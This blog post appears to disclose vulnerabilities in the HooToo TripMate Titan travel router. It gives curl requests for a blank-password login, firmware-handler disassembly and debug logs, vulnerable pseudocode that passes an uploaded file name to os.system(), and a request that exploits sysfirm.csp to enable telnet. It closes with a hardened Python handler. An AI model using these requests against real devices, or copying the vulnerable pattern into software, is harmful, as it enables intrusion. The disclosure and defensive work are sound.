Last October (2017), I had a couple of evenings free during an on-site project, and the HooToo TripMate Titan was at hand. I think we should have a look.

I usually hope to find nothing (it is always exciting to be in unknown territories), but this time Google already had multiple hits:

- a GitHub repository containing HooToo TripMate Titan research notes,
- "Protecting the digital nomad" (blog post series, part 1 of 4),
- "Hacking travel routers like it's 1999",
- a DefCon presentation and blog post series (part …).

I recommend giving them a read. The earlier research covers the vulnerabilities its author exploited to reach unauthenticated remote code execution. Along with them, we can also find additional memory corruption vulnerabilities: an unauthenticated buffer overflow in mac_table and an unauthenticated buffer overflow in open_forwarding.

We confirmed that the HooToo TripMate Titan HT-TM05 (firmware HooToo-TM05-Firmare-2.000.080) was vulnerable to multiple critical vulnerabilities. Where another device's binary shares the same vulnerabilities, it is more than likely that those routers are vulnerable as well.

The following curl request attempts to log on to the web interface using an empty password, resulting in an error (login failed):

    curl -i -s -k -X $'POST' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 42' -H $'Connection: close' --data-binary $'fname=security&opt=pwdchk&

Successful login using a blank password:

    Set-cookie: SESSID=p41UE1ZlWl46OrDxongjZirYJ9enqPrQSrAoiwA9JDfw5;

An entry from the device's shadow file, as it appears on the page:

    :13341:0:99999:7:::

After some reversing, we identify the cgi class responsible for handling HTTP POST forms; the structure is referenced by many CGI callbacks. Snippet of the s_cgi structure initialization:

    .text:004F5A64                 lw      $v1, 0x28+cgi($sp)
    .text:004F5A68                 lui     $v0, 1
    .text:004F5A6C                 addu    $v1, $v0
    .text:004F5A70                 la      $v0, loc_4F0000
    .text:004F5A74                 nop
    .text:004F5A78                 addiu   $v0, (cgi_form - 0x4F0000)
    .text:004F5A7C                 nop
    .text:004F5A80                 sw      $v0, s_cgi.fct_cgi_form($v1)

With that, we can already change the Content-Type of the POST request accordingly. Debug output when receiving a POST request:

    (httpd.c,thdatatab_alloc,1798)Allocate data 0x5af760
    (httpd.c,httpd_parse_request,776)recevie length: 273
    (httpd.c,httpd_parse_request_line,827)REQLINE:POST
    Content-Type: multipart/form-data; boundary=-----------2052049399
    Content-Disposition: form-data; name="test"
    (cgi.c,cgi_tab_alloc,2148)Allocate cgi 0x0x598ab8
    (httpd.c,ht_header_find,1449)Fail: Miss find
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SCRIPT_NAME, v=protocol.csp)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=GATEWAY_INTERFACE, v=CGI/1.1)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_PROTOCOL, v=HTTP/1.1)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REQUEST_METHOD, v=POST)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_NAME, v=)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_PORT, v=81)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REMOTE_ADDR, v=)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REMOTE_IDENT, v=OS:[Windows]-Browser:[])
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=CONTENT_TYPE, v=multipart/form-data; boundary=-----------2052049399)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=CONTENT_LENGTH, v=95)
    prgcgi_main_handler begin:prgtab[0].name=protocol.csp
    (cgi.c,cgi_init_parse_env,966)cgi->envlen == 0
    (cgi.c,cgi_sess_start,1831)Create a new session: BjxbMS2rYcPZzBSn2srcbR37hX7dMSef3LqQuigsn5qUz
    prgcgi_main_handler end:prgtab[0].name=protocol.csp
    (cgi.c,cgi_tab_free,2187)Free cgi 0x0x598ab8
    (ht_cgi.c,ht_cgi_do,184)Free CGI memory finish
    (httpd.c,httpd_schedule,685)Socket list are empty.

The form data may contain name and filename parameters (which we did not know yet, and which look interesting), and so on. As soon as we understand that we can pass a filename parameter, we can send a request that sets it. Next, consider what happens if we send a POST request whose filename parameter points to a parent directory.

Pseudo-Python code of do_firmware_update:

    if not os.path.exists(useful_path):
        os.system('mkdir -p %s' % useful_path)
    file = HTTP_POST['file']
    fullpath = '%s/%s' % (useful_path, file)
    os.system('chmod 0700 %s' % fullpath)
    thread.start_new_thread(do_firmware_update)

Exploiting sysfirm.csp to enable telnet:

    $ curl -i -s -k -X $'POST' -H $'AAAA: BBBB' -H $'Content-Type: multipart/form-data; boundary=----------43' --data-binary $'------------43\x0d\x0aContent-Disposition: form-data; name="file"; filename="AAAA"\x0d\x0a\x0d\x0a

A fragment of the device's service start script:

    savesc 3 /usr/sbin/$PRGNAME $SRVNAME
    echo "$SRVNAME service start failure"

The accompanying Python script is built on requests (it catches requests.exceptions.ConnectionError). Partial ASLR is enabled on the router, but the memory layout appears to be quite similar across reboots, hence the hardcoded offsets.
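As an added, defender-side illustration (not code from the original post or from the router firmware), here is a hardened Python equivalent of the do_firmware_update sequence shown in the pseudocode above, which built '%s/%s' % (useful_path, file) from the client-supplied multipart filename and passed it to os.system(). FIRMWARE_DIR, safe_firmware_path and stage_firmware_upload are assumed names, and the form dictionary stands in for the parsed multipart body.

```python
import os
import re

# Added example, not the router's code: a hardened stand-in for the
# firmware-update handler sketched in the pseudocode above. Names here are
# assumptions for illustration.
FIRMWARE_DIR = "/tmp/firmware"  # assumed staging directory

# A plain file name: no slashes, no leading dot, no shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def safe_firmware_path(filename, base_dir=FIRMWARE_DIR):
    """Return the absolute path for a client-supplied file name, or None.

    Two independent checks: the name must match SAFE_NAME, and the resolved
    path must still have base_dir as its immediate parent (this also rejects
    a pre-existing symlink inside base_dir that points somewhere else).
    """
    if not filename or not SAFE_NAME.match(filename):
        return None
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, filename))
    if os.path.dirname(full) != base:
        return None
    return full


def stage_firmware_upload(form, base_dir=FIRMWARE_DIR):
    """Hardened equivalent of the vulnerable sequence.

    `form` is the parsed multipart body as a dict with 'filename' and 'file'
    (bytes). Directory creation and permission changes go through os APIs
    directly, so no request-controlled string ever reaches a shell.
    Returns the written path, or None when the name is rejected.
    """
    path = safe_firmware_path(form.get("filename", ""), base_dir)
    if path is None:
        return None  # reject instead of handing the name to os.system()
    os.makedirs(base_dir, mode=0o700, exist_ok=True)  # was: os.system('mkdir -p %s')
    with open(path, "wb") as fh:
        fh.write(form.get("file", b""))
    os.chmod(path, 0o700)  # was: os.system('chmod 0700 %s')
    return path
```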